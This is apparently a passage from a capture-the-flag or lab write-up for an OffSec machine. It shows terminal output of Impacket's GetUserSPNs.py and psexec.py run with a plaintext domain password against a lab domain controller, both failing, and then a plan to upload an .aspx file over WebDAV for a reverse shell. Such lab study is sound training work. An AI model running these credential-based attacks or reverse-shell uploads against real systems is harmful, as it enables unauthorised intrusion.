╭─ /home/kali/impacket/examples  master ?31  ✔  root@kali
╰─ GetUserSPNs.py hutch.offsec/fmcsorley:'CrabSharkJellyfish192' -dc-ip 192.168.105.122 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Tried to look for Kerberoastable accounts but was unable to.
╭─ /home/kali/impacket/examples  master ?31  ✔  root@kali
╰─ python3 psexec.py hutch.offsec/fmcsorley:'CrabSharkJellyfish192'@192.168.105.122
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 192.168.105.122.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
PSEXEC also went nowhere.
So I remembered that we still have WebDAV enabled on the web application, so we can possibly use cadaver with our credentials to upload a .aspx file, since that is what the website uses, and get a reverse shell.